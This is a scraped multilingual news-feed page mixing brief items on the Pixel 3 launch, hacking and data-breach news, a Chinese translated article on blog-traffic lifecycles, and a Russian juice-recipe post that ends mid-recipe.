Let's just get this out of the way: The Pixel 3 XL is not a pretty phone. It's got a canyon for a notch, a valley for a chin, and thick bezels around its screen. Put it in a Pepsi challenge with any 2018 phone—and even some 2017 models—and nearly ...
The 5 Most Important Announcements From Google's Pixel EventLifehacker Australia
Google continues push into gadgets with Home Hub and third generation premium smartphoneNEWS.com.au
Google Pixel Slate: Google Might Have Finally Made a Near-Perfect Chrome OS DeviceGizmodo Australia
Techly -iTWire -The Australian -Yahoo News
all 3,294 news articles »

          The frightening rise in health care data breaches, charted      Cache   Translate Page      

Hackers increasingly are turning their attention to the health care sector?but data breaches among certain industry stakeholders are more likely to compromise patient records than others, according to a study published last month in JAMA.

MORE >>


          Thacker, Richard J.      Cache   Translate Page      
Thacker, Richard J. On Saturday, October 6, 2018, Richard J. Thacker, age 80, of Caledonia, formerly of Chicago, was called to his heavenly home....
          Após ataque hacker Instagram implementa nova segurança      Cache   Translate Page      
A autenticação de dois fatores é hoje utilizada por diversas empresas, em seus sites e aplicativos que exijam autenticação por parte do usuário, com esse modelo de autenticação, o usuário deve passar por dois fatores antes de conseguir acessar sua conta, o primeiro fator geralmente é sua senha de acesso, o segundo fator pode ser […]
          Commenti su Attacchi hacker, ecco i siti bresciani presi di mira di Max      Cache   Translate Page      
Una persone con delle doti del genere, andrebbe tutelata non punita. Dopotutto, oltre che entrare per sfida o per gioco nei vari siti, non sembra che abbia rubato identita' o denari a qualcuno. Fossi io un responsabile nazionale della sicurezza, un posticino ben pagato negli uffici della combricola "malati del computer " glie lo offrirei volentieri.
          Praktikum Java-Entwickler (m/w) IT/Informatik, Softwareentwicklung - Karlsruhe      Cache   Translate Page      
Jobangebot: Mehr Infos und bewerben unter: https://www.campusjaeger.de/jobs/7472?s=18101178+ Wen suchen wir? * Geek, Hacker, Code-Guru: Du besitzt solide Kenntnisse in der Programmierung? Du hast keine Berührungsängste mit neuen Technologien? Du kannst Dich schnell einarbeiten? * Sympathisch: Du bist flexibel, sympathisch und lernbereit? Du arbeitest gerne im Team, kannst aber auch selbstständig Dinge voranbringen? * Mutig: Du bist lösungsorientiert und verantwortungsbewusst? Du hast Spaß an neuen Herausforderungen?+ Was bieten wir dir? * Technische Herausforderungen: Wenn Du mit ausgewiesenen Experten an einer bleeding-edge-Technologie mitarbeiten willst, bist Du bei uns richtig. Hierbei nutzen wir ... 0 Kommentare, 66 mal gelesen.
          North Korea Blamed - Cyberattack Hit 16 Banks Worldwide      Cache   Translate Page      
1.8 billion dollars stolen from Taiwan by N. Korea (58 Million USD/44 Million UK). - Last year, a cyberattack siphoned NT$1.8 billion Taiwan dollars from Taiwan''s Far Eastern International Bank. U.S.-based cybersecurity company FireEye recently released the results of an extensive probe on the cyberattack. The report concludes that the crime was carried out by two hacker groups based in North Korea, which stole from 16 banks around the world to raise funds for cash-strapped Pyongyang. Far Eastern International was robbed of NT$1.8 billion in a cyberattack last year, as part of a crime wave that has compromised 16 institutions across the world. A new report by U.S. cybersecurity firm FireEye linked the crime to two North Korea hacking groups dubbed "Lazarus" and "APT38."Jian Hong-weiExecutive Yuan''s cybersecurity unitTheir target was the interbank transfer system known as SWIFT. They first used ransomware to infiltrate the institution. The bank's response team tried to crack the encryption and then deal with the ransomware.
          Google Pixel 3 & Pixel 3 XL first impressions: Initially delightful in the way Pixel 2 wasn't - 9to5Google      Cache   Translate Page      

9to5Google

Google Pixel 3 & Pixel 3 XL first impressions: Initially delightful in the way Pixel 2 wasn't
9to5Google
Google Pixel 3 and Pixel 3 XL have finally arrived, and there's not much to be surprised about in terms of specs on paper. All the leaks were spot-on. There's no Pixel Ultra. So while we would — in a normal year — be barely processing where these ...
Google takes on the iPad Pro and Surface Pro with the Pixel SlateMashable
Google's Home Hub Is Missing a Camera. Here's Why That's a Smart IdeaTIME
Google Pixel's product directors on single cameras and notchesTechCrunch
Lifehacker -Telegraph.co.uk -The Independent -YouTube
all 3,280 news articles »

          Secret access codes needed to buy NSLC weed online      Cache   Translate Page      

Here's a fun way to pretend you're some kind of hacker man.

The Nova Scotia Liquor Corporation announced today how it's going to keep recreational cannabis that's sold online out of the hands of those under 19.

An online access code will be required to visit and make purchases at the province's new online cannabis store, which is set to launch October 17.…
          Comment on Lotte Website Crippled Since Tuesday As Chinese Hackers Protest American Missiles by seo google      Cache   Translate Page      
Very good article. I am going through many of these issues as well..
          Global cybercrime shifts to state-backed hackers: Russian group      Cache   Translate Page      
The latest innovations in cybercrime have shifted from financially motivated actors to state-backed hackers focused on sabotage and intelligence gathering, a Russian cybersecurity firm said ...
          Commenti su Images Gallery Post Type di seemybed      Cache   Translate Page      
Hello! I know this is kind of off topic but I was wondering which blog platform are you using for this website? I'm getting tired of Wordpress because I've had problems with hackers and I'm looking at options for another platform. I would be awesome if you could point me in the direction of a good platform.
          Hackers Breach Smart Contract on Ethereum-Based Adult Entertainment Platform SpankChain      Cache   Translate Page      

Ethereum-based adult entertainment platform SpankChain has suffered a smart contract security breach that led to loss of around $38,000, the firm reported on its Medium page Oct. 9. The hack, which purportedly took place Oct. 6, was detected by SpankChain a day after, and was announced today in a post entitled “We Got Spanked: What […]

Post source: Hackers Breach Smart Contract on Ethereum-Based Adult Entertainment Platform SpankChain

More Bitcoin News and Cryptocurrency News on TheBitcoinNews.com


          Google's Home Hub Is Missing a Camera. Here's Why That's a Smart Idea - TIME      Cache   Translate Page      

TIME

Google's Home Hub Is Missing a Camera. Here's Why That's a Smart Idea
TIME
At Tuesday's Google event, the company unveiled the extensively leaked Pixel 3 and 3 XL smartphones, in addition to both a new ChromeOS tablet, the Pixel Slate, and a new smart home assistant in the form of Google Home Hub. While Google's made ...
The 5 Most Important Announcements from Google's Pixel EventLifehacker
Pixel 3 launch: Google unveils new smartphone and Home Hub smart screenTelegraph.co.uk
Google Pixel 3 release – as it happened: Price, release date and features revealed for new Android phones and moreThe Independent
YouTube
all 3,303 news articles »

          Моды на GTA San Andreas iOS ( Часть 3 )      Cache   Translate Page      

Взломы предоставляются конфиденциально! По всем вопросам к админу сообщества: https://vk.com/os_hacker. source

Посмотрите, может интересно?How To Download Crysis 3 Latest 2017 No Surveys No Passwords Direct LINKкоды на GTA San Andreas и Quake 3 ArenaHow To Download Crysis 3 Latest 2017 No Surveys No Passwords Direct LINKТОП 3 хоррор моды GTA San Andreas, которые тебя напугаютLenovo K4 Note Gaming Review With Overheating Check! (Asphalt 8, NOVA 3, MC5, GTA)Трюки из GTA San AndreasLenovo Vibe P1m Gaming Review With Temp Check and Benchmarks

Запись Моды на GTA San Andreas iOS ( Часть 3 ) впервые появилась Информационно развлекательный портал.


          Pszichiátrián vizsgálnak egy orosz hackert      Cache   Translate Page      
A férfi határozottan tagadja, hogy hacker lenne.
          Pagliaccio, pacifista o comico: le lauree più pazze del mondo      Cache   Translate Page      
La minaccia più concreta è che l'inesorabile automazione di ogni singolo lavoro renderà inutile quello che è il supremo titolo di studio: la laurea. Sarà carta straccia per molti, come se fosse stato inutile superare tutti quegli esami. E per non scoraggiarci, ci rincuora il diabolico marketing o la fantasia di alcuni professori di atenei sparsi nel globo terracqueo: esistono corsi di laurea totalmente inutili, organizzati per farsi pubblicità e garantire la disoccupazione.Se dovessimo fare una classifica delle lauree più insignificanti, perniciose per una carriera professionale, l'Europa, includendo l'Italia, è da hit parade. Ad esempio, la Gran Bretagna, in fuga dall'Europa, terra di antiche e prestigiose accademie, culle del sapere e di Premi Nobel, ha nell'Università del Kent un coraggioso corso triennale di "Stand-up comedian". Quindici esami triennali per creare un comico che da solo, su un palco, senza sedersi mai, privo di scenografia, deve intrattenere, possibilmente facendo molto ridere, il pubblico di un teatro come di un bar. Anche Jerry Lewis ha iniziato così, mosso dal talento, più che da una specifica erudizione. "È una forma teatrale di successo e anche i più negati potrebbero imparare la tecnica", dicono dal Kent.In Olanda, a Rotterdam, l'Università di Codarts, garantisce di trasformarvi in un pagliaccio nel giro di due anni, con il corso in "Clown e arti circensi". Qui si studia per fare il buffone sotto a un tendone, o alle feste di compleanno della nipotina e delle amiche. Si insegna anche a volteggiare sul trapezio e a interagire con foche, elefanti e leoni. Per l'ultimo corso la segreteria chiede una liberatoria nel caso lo studente ci lasci la pelle. O la testa tra le fauci feline. Ma più che i rischi professionali, spaventa il fatto che il circo sta lentamente morendo, quei pochi sopravvissuti hanno giustamente rinunciato agli animali e di certo non assumono più. E, poi, bambini e ragazzini oggi preferiscono la Play Station.Nell'Università di Roskilde, in Danimarca hanno le idee chiare sul concetto, ma noi non sull'applicazione. Se un direttore di un festival, un imprenditore e un wedding planner unissero le loro forze, ne uscirebbe un "design perfomer". Che cosa sia, però, nessuno sa spiegarlo con convinzione: dovrebbe essere un esperto capace di analizzare, sviluppare e gestire festival e conferenze. Ma per questo non basta una laurea in Comunicazione?Forse bisognerebbe porre un freno all'entusiasmo con cui la Ue finanzia gli atenei. In Portogallo l'Università di Coimbra, offre una laurea biennale di "Pace, sicurezza e sviluppo". Perché se il mondo corre inesorabilmente verso la guerra nucleare, abbiamo bisogno di menti erudite capaci di salvare le sorti globali con un paio di esami. Secondo l'università questa laurea magistrale vuole approfondire la "conoscenza teorica e concettuale delle problematiche legate alla pace, alla sicurezza, allo sviluppo e alle sfide umanitarie nel mondo". A parte questo, l'ateneo non chiarisce quali siano i possibili sbocchi professionali per gli studenti.A Belgrado, nella sua università fondata nel 1808, tra le 31 facoltà disponibili e i 150 corsi accademici, spicca "Scienze bibliotecarie e informatiche" che, sulla carta, sembrerebbe avere un senso. Tre anni di studio di scienza bibliotecaria e informatica per gestire una biblioteca. Sinceramente basterebbe un corso di due mesi. Poi la triste realtà ci dice che in Serbia le pochissime biblioteche rimaste in piedi dopo la guerra, sono a rischio chiusura perché prive di fondi. In Pennsylvania, c'è un corso per "Hackeraggio non criminale": imparerete a entrare in qualsiasi sistema informatico blindato, dal Pentagono alla Banca Europea, senza rubare o fare danni. Così, per curiosare.E da questo demenziale spreco di risorse accademiche, non è esente l'Italia. A Bari ci si laurea in "Igiene e benessere del cane e del gatto". Non serve una laurea precedente in "Veterinaria", basta l'entusiasmo e due anni a perdere. Un posto come toelettatore per quadrupedi e felini è, forse, assicurato. A Bologna, al Dams, esiste una specializzazione in laurea magistrale in "Discipline dello spettacolo dal vivo", consigliato ad "aspiranti critici teatrali, registi e attori con un solido bagaglio culturale" recita l'opuscolo informativo. Da questo corso di laurea si esce "professionisti connessi all'arte scenica". La Federico II di Napoli ha attivato una laurea triennale in "Verde ornamentale". I possibili impieghi vanno dalla progettazione degli spazi verdi alla produzione vivaistica.Anche Pisa, come nel Kent, potete buttare via tre anni della vostra vita con una bella laurea magistrale in "Scienza per la pace". L'ateneo pisano è l'unico italiano per i "Peace Studies". Nell'università di Firenze, fondata sette secoli fa, ci si laurea in "Sviluppo agricolo in zone tropicali". Così da chiedervi se cresceranno i carciofi a Bangkok.
          Out of the classroom and into the mire: a hacking competition for cyber security students - Telstra Exchange (blog)      Cache   Translate Page      

Telstra Exchange (blog)

Out of the classroom and into the mire: a hacking competition for cyber security students
Telstra Exchange (blog)
Talk about being thrown in the deep end – it may be years before they toss their academic hats in the air, and yet 427 university and TAFE students have been snatched out of cyber security classrooms and thrown behind computers to find and fight real ...


          AGI: Chi è l’hacker italiano che ha bucato la Nasa, la Rai e la Cgil      Cache   Translate Page      
Chi è l’hacker italiano che ha bucato la Nasa, la Rai e la Cgil Un 25enne di Salò ha confessato. Nunzia Ciardi, direttore della Polizia Postale: “Abbiamo seguito le briciole di Pollicino e poi siamo arrivati alle prove. Adesso il giovane rischia parecchio.” di ARTURO DI CORINTO per Agenzia Giornalistica Italia del 08 Ottobre 2018 […]
          Skripala v Česku sledovali stejní muži, kteří ho podle Britů otrávili      Cache   Translate Page      
Dva Rusové, které Britové viní z otravy bývalého dvojitého agenta Sergeje Skripala a jeho dcery Julie, byli údajně v říjnu 2014 tajně v Česku. V té době tu byl i Skripal, který pomáhal českým kolegům s odhalováním ruských špionů. Podle zdrojů iRozhlas.cz měla už tehdy dvojice Skripala sledovat.
          BCM-News Daily Digest      Cache   Translate Page      

Vorwürfe gegen Apple: Apple dementiert vor US-Kongress Bericht über Spionagechips | ZEIT ONLINEChinesische Hacker sollen laut einem Bericht Konzerne wie Apple […]

Weiterlesen…

Der Beitrag BCM-News Daily Digest erschien zuerst auf Business Continuity Management News.


          Hacker penetrates Spankchain smart contract, escapes with booty      Cache   Translate Page      
A hacker exploited a re-entrancy bug in the Spankchain payment channel contract.
          10W+文章背后的科学:内容生命周期的五个阶段       Cache   Translate Page      

编者按:文章阅读量达到10万+被认为是一篇文章成功的标志。但是10万+文章都有哪些特点呢?数据分析师Andrew Tate通过Google Analytics研究了那些10万+文章的流量构成与走势特点,总结出了一套成功的模板。当然,那些其实只是成功的结果,关键还是看文章标题、内容以及营销。

所有成功的内容营销套路都是一样的。

至少,这是我们的直觉,我们希望能证实这一点。我们已经见过很多火起来的文章,在几个月甚至几年后仍然带来稳定的有机流量。我们也目睹了很多文章的失败,在发表1、2天之后就流量变成了一条平线。

博客文章往往遵循若干类似的“形态”——也就是说,Google Analytics上面的数据点能够透露这篇文章的故事。无需知道太多有关关键词数量或流量来源你就能解读这些形状。你甚至可能还可以说出这篇文章在发表的几周内会不会火或者哑火。但是这一切都是没有考证的猜测。我们希望找出成功的指向性模式——更重要的是,具有预测性的模式。所以我们非常仔细地考察了一些浏览量超过10万的文章,想看看我们的观察是不是有数据支撑。

最后的结果提供了一个成功的模板,但也为衡量你的内容提供了新的、更加科学的思考方式。

内容生命周期的5个阶段

把内容看作是病毒或者常青树的想法都是有局限性的。要想成功,理想情况下一篇文章必须既要有短期的吸引力又要有长期的参与度(点赞、转发、评论、下载等)。其在Google Analytics上的表现形态能透露这个秘密。你大概已经见过很多文章的流量一开始扶摇直上,然后直落九天。

我们把10万+的生命周期内页面访问量作为一篇文章成功的标杆,但当然这不是定义成功的唯一方式。不过,显然进入10万+俱乐部的文章已经带来了很好的价值。

这个俱乐部成员大多有非常相似的形状。这里就是一个例子:

例子#1:原生型成功

AdEspresso,《我们分析了752,626条Facebook广告,以下是我们的发现

这篇文章,跟其他同样成功的文章一样,走势经历了5个不同阶段:

  1. 尖峰期,文章刚刚发表的时候。

  2. 低谷期,看起来好像增长停滞了一样。

  3. 增长期,页面浏览量在几个月内增加了。

  4. 高原期,增长进入平稳状态。

一开始的尖峰期让这条长尾显得非常突兀。这篇文章绝大部分的页面浏览量都是在尖峰期获得的。(AdEspresso有13篇文章拿到了10万+。这一点令人印象深刻。)

这里是另一篇有着相同增长形态的10万+浏览量的例子,来自Appcues。只是尖峰期没那么突兀,所以显得增长其更明显一些:

例子#2:长尾型成功

Appcues,《5个最好的用户引导例子

我们仔细看看例子#2.如果把流量来源分解一下的话,就可以看出不同阶段的浏览量驱动力来自哪里:

一开始的尖峰是社区链接(橙色)驱动的,比如GrowthHackers、Inbound、Designer News、Reddit以及The Hacker News等。另外还有些流量来自电子邮件(绿色)和直接流量(红色)。几周后出现了第二次隆起,这次是来自电子邮件和社交媒体(青色),是那些渠道第二轮宣传的结果。

然后整体的力量情况就平缓地走了几周。第二次电子邮件驱动尖峰与增长期开始之间的时间窗口超过3个月。在此期间,总体流量每周大概涨100左右。看起来文章也就这样了。

不过接下来就进入了第二个阶段——增长期。增长慢慢地来自于有机的搜索流量。就这篇文章而言,有机流量在25周这个标志时间后就开始出现了。到了那个时点有机的搜索流量成为这篇文章所有流量的重要组成部分。

在大概前半年的时间里这篇文章都有流量进账,其中大多数来自直接浏览、电子邮件以及推荐。但在下半年,有机流量开始接管,从仅占流量一小部分发展到占据了文章流量的绝大部分。

我们在低谷期(大概是12周到25周之间)也看到了类似的情况,有机流量也只是占总流量的一小部分。头条的数字基本上已经持平,但是有机流量已经开始压倒直接流量、邮件流量、社区以及社交流量的颓势,成为主导。

巅峰的时候有机流量占到了这篇文章的7.4%。对于增长来说,决定成功的并不是绝对数,而是有机/其他流量的占比。

到达1年的标志点时,文章过渡到了第四阶段——高原期。此时文章已经升到了相关关键词的第一位,在此类关键词搜索量中排行第一。此后一直保持该排名长达一年多,直到流量开始下降。

如果我们仔细看看这篇文章不同阶段的流量占比的话,我们会看到:

约97%的流量是在一开始那波阅读高峰之后积累下来的。更令人不可思议的是90%的流量是在文章已经上线6个月后。

第五阶段——下降期——在这篇文章也体现得很明显。发生这种情况是因为更新的内容取代了这篇文章并且开始蚕食其有机流量,导致总体流量下降,或者当目标关键词的搜索量下降时出现。

我们再看看同样形态的两个例子,也是来自10万+的文章。第一篇是2015年发表的:

例子#3:缓慢下降

Wistia,《用佳能5D Mark III录制音频

一开始的尖峰期、增长期以及高原期都是看得见的。在本例中,这篇文章在过去2年一直在缓慢下降,尽管每周仍然给博客带来200左右相当数量的浏览量。鉴于这篇文章的持久价值,它已经为一次内容刷新做好了准备。只需要把标题和部分内容修改一下,下降的趋势就会停止或者反转。

这是另一个例子,这篇是2014年发表的:

例子#4:持续增长

I Done This,《贝索斯两块披萨团队规则背后的科学

I Done This的这篇文章似乎没有遭遇下降之苦,即便是在4年之后。实际上,其渐进性的增长一直都在持续。

那么为什么Wistia的文章会呈现出下降趋势而这篇却逆势上扬呢?差别在于这两篇文章的主题。第一篇(长衰期)文章的主题是硬件相关的,而这是有时间窗口期的。第二篇(漫长的增长阶段)讲的东西是真正不受时间限制的。

那么从中可以总结出什么东西呢?

  • 分发很重要。我们看到的几乎所有成功的文章都经历过一个强劲的尖峰期。这初始的流量让你能够播下有机的种子。大家必须看到你的文章才能链接它。此外,索索算法可以收集大家如何跟你的新文章互动的数据(停留时间、跳出率等,这些都是排名要考虑的因素)。让文章通过Reddit、Twitter尤其是你的邮件列表流传出去对于认知度非常重要,这种认知会带来随后可帮助推动有机流量的链接。

  • 来自搜索的增长。但如果你想要在Hacker News上引起轰动但又没想过第一天过去之后的该怎么办的话,你的文章充其量只会昙花一现,你的博客不会增长。此外,过了一定时候,一开始的阅读尖峰似乎就不能增加后续流量的规模或者速度了——持续的成功更多的跟网页优化、内容质量以及永不过时的主题有关。

  • 体量决定你的博客规模。有机流量的天花板很容易测量。如果每一个目标关键词你都是排名靠前的话,那你的流量也会靠前。选好能推动流量和转化率的关键词组合(在漏斗的中间和底部)。每一个都会提供他们自己的价值。

  • 下降不可避免。几乎在所有阶段。长青的内容还可以持续增长好几年,但是其他网站会想办法把你从搜索结果前列挤掉。如果你今天站在了那个位置上的话,要想让它明年还能保持位置你仍然需要努力。

最后一条总结——这个需要时间。前面提到的成功的文章都经过了多年的积累。一开始的尖峰期不大可能就产生10万+的流量,但是有机的流量一夜之间发展出10万+也不可能。积累这两种流量都需要时间,不过你早早就能看出自己是否朝着正确的方向前进。

你的文章会不会火?以下是需要注意的地方

在发表1、2年之后分析一篇文章的成功或者失败很容易,但是你能早早就说出一篇文章能否在搜索中获得关注吗?

这个问题归结为你能否到达阶段三,也就是增长期。如果你在6个月之内达到有机增长的斜率,那文章就是成功的。如果在低谷期没有出现升势,你就不会有增长。

下面这个例子是一篇来自Amplitude的文章。发表于2016年,这篇文章没有到达10万+,但显然正在实现的路上:

例子#5:成功不可避免

Amplitude,《关于环比增长率你犯的3个错误

这篇文章比之前的#1例子(AdEspresso)和#2(Appcues)到达阶段三都要早得多。一开始的尖峰期是通过邮件实现的,不过在3个月内这篇文章就发展到了有机搜索流量。阶段二几乎不存在。

当我们查看一下不同渠道对流量的贡献时,在半年之内有机的贡献率已经超过了90%。这是成功的关键——有机流量确立优势越快,显著(和被动)的流量变化就能出现越快。你可以通过在尖峰期过后投入时间到推广和建立链接来缩短低谷期。你也可以更新内容和优化网页SEO来改进成功的机率。

这篇文章浏览量在继续增长。它还没有达到高原期。考虑到目前其浏览量约为75000,所以突破10万+指日可待。

并不是所有文章都要达到10万+才能被认为是成功的。一篇文章可以实现的总浏览量要卡其目标关键词的搜索量。小众型的文章在自身的局限内也可以成功。下面就是一篇来自Clearbit的文章例子,其浏览量未必能达到10万+,但是仍然可以被视为是成功的:

例子#6:更小的有机胜利

Clearbit,《选择机会的现代指南

这篇文章的尖峰期主要是由直接流量驱动的,不过后者随后就出现了下挫,然后增长量被有机搜索取代。增长期的斜率较为平缓,但仍然很明显,而且是在6个月之内开始的。经过1年之后,增长看起来达到了稳定状态。

ProfitWell的这篇文章也能看到同样的趋势,尽管其增长期持续更长:

例子#7:搜索量创造天花板

ProfitWell,《SaaS是如何进行收入确认的

像这样的文章流量受限于主题的小众性。但是——这个“但是”很重要——这篇文章是直接面向他们其中一款产品的买家角色的。那些人通过搜索找到了这篇文章然后加以阅读,这些人群正是这家公司希望接触的人。

当然,这未必总能见效。而且经常不见效。下面就是一个例子,这篇文章出自一家成功的公司的成功博客,但是从未到达增长期。低谷期变成了一条平线:

这篇文章有48%的流量是第一天取得的。迄今为止只有7.2%的流量是来自于搜索。这是极其常见的。我们上面用来作为例子的10万+俱乐部的文章都是异类。如果你希望在发布数天乃至数周之后将会带来很多流量的话,以下是需要注意的一些地方:

  1. 小规模的初始尖峰。如果你在第一周看不到很好的文章流量的话,这并不意味着失去一切但的确意味着反向链接不会到来。有了这个尖峰意味着大家意识到了你的内容。这是重要的第一步。

  2. 逐周的有机增长。尤其是头6个月,你应该每周都能看到文章流量的稳步增长。这意味着文章已经站稳了脚跟,而且这股势头会导致飞轮效应——看到文章内容的人越多,他们链接转发的机会就越多,从而改善了排名并曝光给更多的人。

  3. 来自长期流量的超大规模回报。Tom Tunguz说“tomtunguz.com上面的文章第一天产生的浏览量通常只有总量的1/3。”我们的发现也一样。对于前面提到的那些文章来说,我们发现出自第一周的流量<10%。成功的博客文章~90%的流量是在此后产生的。

这一点很令人启发。情况当然会因人而异。但利用Google Analytics通过上述5个阶段的视角来分析的话,你就能理解流量的“成功”是什么样的,进而了解到什么东西对你的读者有效。

内容营销的复合效应

成功的文章是通过好的初始分发和稳定的有机增长发展流量的。成功的博客是通过将成功的文章彼此链接发展起来的。

本文提到的第一篇文章其实只是AdEspresso博客众多10万+文章中的一篇。当我们把表现最出色的文章叠加到一起时,就能看到有机增长是如何导致博客整体流量的增长的:

这只是流量表现排名前10周浏览量达到了20000的文章。AdEspresso已经发表了几千篇文章。他们博客的总体流量是这样的:

他们的周流量几乎达到了15万。这纯粹是通过内容营销的复合效应实现的。比如一篇文章链接另一篇文章等等。只要你能够定期达到增长期,你就可以发展出一个非常大型的博客。

博客甚至还有涌现属性——也就是总体大于局部之和。个体文章表现越出色,搜索引擎越会将你的博客视为一流资源并将你排名靠前。

但是这种成功是建立在个体文章的基础上的。那些文章必须表现出色。当你知道了成功的迹象时,你就可以钻研在初始和长期分发方面哪些因素对你读者起作用,哪些不起作用。这样一来,你就能不断地复制成功,在一篇篇好文章的基础上做出一个好的博客来。

原文链接:https://www.animalz.co/blog/the-shape-of-content/

编译组出品。编辑:郝鹏程。



          Reactie op Hindostaanse jongeren geven invulling aan 145 jaar Hindostaanse immigratie door melhor site apostas desportivas      Cache   Translate Page      
Hey there! I know this is kinda off topic but I was wondering which blog platform are you using for this website? I'm getting sick and tired of Wordpress because I've had issues with hackers and I'm looking at options for another platform. I would be great if you could point me in the direction of a good platform.
          Americký soud poslal Nikulina na psychiatrické vyšetření, podle advokáta je apatický - Aktuálně.cz      Cache   Translate Page      

Aktuálně.cz


Aktuálně.cz
Jevgenije Nikulina vydala Česká republika do Spojených států kvůli podezření, že stojí za hackerskými útoky na sociální síť LinkedIn nebo úložiště Dropbox. San Francisco - Rusa Jevgenije Nikulina, jehož letos na jaře Česká republika vydala do USA kvůli ...



          SoftPerfect NetWorx 6.2.3 Multilingual Portable      Cache   Translate Page      
SoftPerfect NetWorx 6.2.3 Multilingual Portable

SoftPerfect NetWorx 6.2.3 Multilingual Portable | 29.3 Mb
NetWorx is a simple, yet versatile and powerful tool that helps you objectively evaluate your bandwidth consumption situation. You can use it to collect bandwidth usage data and measure the speed of your Internet or any other network connections. NetWorx can help you identify possible sources of network problems, ensure that you do not exceed the bandwidth limits specified by your ISP, or track down suspicious network activity characteristic of Trojan horses and hacker attacks.


          William Makepeace Thackeray: Pendennis története I-II. (*89) - Jelenlegi ára: 400 Ft      Cache   Translate Page      
William Makepeace Thackeray: Pendennis jó és rossz sorsának, barátainak és legnagyobb ellenségének története. I-II.
A megrendelt könyvek a rendelést követő 2. munkanaptól vehetők át a Könyvgyorsan budapesti antikváriumában a bolt nyitvatartási idejében, vagy kiszállítjuk Önnek a Szállítási és garanciális fül alatt részletezett feltételek mellett.
William Makepeace Thackeray: Pendennis története I-II. (*89)
Jelenlegi ára: 400 Ft
Az aukció vége: 2018-10-10 13:15
          Xiaomi представила ТВ-приставку Mi Box S на Android TV      Cache   Translate Page      

Приставка Mi Box S — это международная версия уже доступной в Китае Mi Box 4, но с некоторыми улучшениями. В частности, появился новый пульт дистанционного управления с выделенными кнопками вызова голосового помощника «Google Ассистент», быстрого доступа к Netflix и запуска прямого эфира.

Mi Box S

Кроме того, Mi Box S обладает функциями Google Chromecast, что позволяет использовать голосовые команды и транслировать видео с подключённого по Wi-Fi смартфона, планшета или ПК.

«Сердцем» приставки стал четырёхъядерный процессор Amlogic S905X с ускорителем Mali-450. Объём ОЗУ составил 2 ГБ, встроенной памяти установлено 8 ГБ. Есть поддержка Wi-Fi 802.11 a/b/g/n/ac (2,4/5 ГГц) и Bluetooth 4.2. Из разъёмов доступны HDMI 2.0, аудиовыход 3,5 мм и USB 2.0.

Mi Box S: разъёмы

Приставка способна выводить видео 4K HDR с частотой 60 кадров в секунду и обладает поддержкой технологий улучшения звука DTS и Dolby Digital Plus. В качестве ОС используется Android TV (версия 8.1 Oreo).

Mi Box S: Меню

В США Mi Box S уже доступна для предзаказа. Старт продаж запланирован на 19 октября. Цена приставки — 60 долларов.


          9 фрешей, которые взбодрят вас осенью      Cache   Translate Page      

Когда, как не осенью экспериментировать с новыми вкусами — ведь это самое витаминное время! Предлагаем насладиться яркими фрешами, которые принесут бодрость, помогут справиться с чувством голода в течение дня, ускорят метаболизм и улучшат пищеварение.

Как правильно пить фреши

  • Пить фрешевые смеси нужно в течение получаса после приготовления, чтобы получить все полезные вещества.
  • Разбавляйте фреши водой, если у вас есть проблемы с желудочно-кишечным трактом.
  • Стоит пить через трубочку или полоскать рот после еды, чтобы уменьшить разрушающее воздействие на зубную эмаль.

Как улучшить то, что и так вкусно

  • Во фреши можно добавить специи и мёд, а вот сахара или соли лучше класть меньше — они разжигают аппетит.
  • Чайная ложка сливок небольшой жирности, добавленная в овощные фреши (но не кислые, иначе сливки свернутся), поможет лучше усвоиться витаминам А, К, D, Е.
  • Небольшое количество оливкового масла для тех же целей можно добавлять во фреши из овощей, богатых каротиноидам. Это тыква, морковь, щавель, помидоры, красный перец.

1. Грейпфрутовый фреш с яблоком и корицей

фреши рецепты: Грейпфрутовый фреш с яблоком и корицей

Ингредиенты:

  • 1 грейпфрут;
  • 1 сладкое яблоко;
  • 1 щепотка корицы;
  • 100 мл воды;
  • зёрна граната.

Приготовление

Очистите грейпфрут и яблоко и отправьте в соковыжималку. В готовую смесь добавьте корицу и воду, по желанию можно положить лёд. Украсьте зёрнами граната и мятой.

2. Тыквенный фреш с сельдереем

фреши рецепты: Тыквенный фреш с сельдереем

Ингредиенты:

  • 300 г тыквы;
  • 1 яблоко;
  • 1 небольшая морковь;
  • зелень сельдерея — по вкусу.

Приготовление

Очистите тыкву, яблоко, морковь и отправьте в соковыжималку. Сельдерей добавьте по желанию. Все эти ингредиенты можно смешать и в блендере, чтобы получить консистенцию смузи и сохранить ещё больше полезных элементов.

3. Апельсиновый фреш с ананасом и имбирём

фреши рецепты: Апельсиновый фреш и ананасом с имбирём

Ингредиенты:

  • 150 г ананаса;
  • 1 небольшой апельсин;
  • 1 небольшой кусочек корня имбиря по вкусу.

Приготовление

Очистите фрукты и имбирь и отправьте в соковыжималку. По желанию можно добавить лёд и украсить мятой или кусочками орехов.

4. Мандариновый фреш с лаймом и грейпфрутом

фреши рецепты: Мандариновый фреш с лаймом и грейпфрутом

Ингредиенты:

  • 3 небольших мандарина;
  • ½ грейпфрута;
  • 1 лайм.

Приготовление

Очистите мандарины и грейпфрут, удалите косточки и отправьте фрукты в соковыжималку. В этот фреш можно добавить по вкусу несколько звёздочек гвоздики и ваниль.

5. Грушевый фреш с бананом и апельсином

фреши рецепты: Грушевый фреш с бананом и апельсином

Ингредиенты:

  • 2 небольшие груши;
  • 1 апельсин;
  • ½ банана.

Приготовление

Груши и апельсин очистите, удалите косточки и отправьте в соковыжималку. Банан разомните вилкой или измельчите в блендере, добавьте к соку и размешайте.

6. Шпинатный фреш с яблоком и морковью

фреши рецепты: Шпинатный фреш с яблоком и морковью

Ингредиенты:

  • 1 пучок шпината (только листья);
  • 1 зелёное яблоко;
  • 1 небольшая морковь;
  • 1 столовая ложка лимонного сока;
  • вода и сахар — по вкусу.

Приготовление

Очистите овощи и пропустите их вместе со шпинатом через соковыжималку или блендер, чтобы получить более плотную консистенцию. Добавьте лимонный сок и сахар по вкусу, разбавьте водой 50/50.

7. Дынный фреш с яблоком и мёдом

фреши рецепты: Дынный фреш с яблоком и мёдом

Ингредиенты:

  • 150 г дыни;
  • 1 яблоко;
  • 1 чайная ложка мёда.

Приготовление

Очистите дыню и яблоко от кожуры и семечек, отправьте в соковыжималку. Дайте соку настояться несколько минут, добавьте мёд, размешайте.

8. Овощной фреш с перцем и огурцом

фреши рецепты: Овощной фреш с перцем и огурцом

Ингредиенты:

  • 1 небольшой сладкий перец;
  • 1 помидор;
  • 1 огурец;
  • ½ чайной ложки оливкового масла;
  • 1 чайная ложка лимонного сока;
  • соль по вкусу.

Приготовление

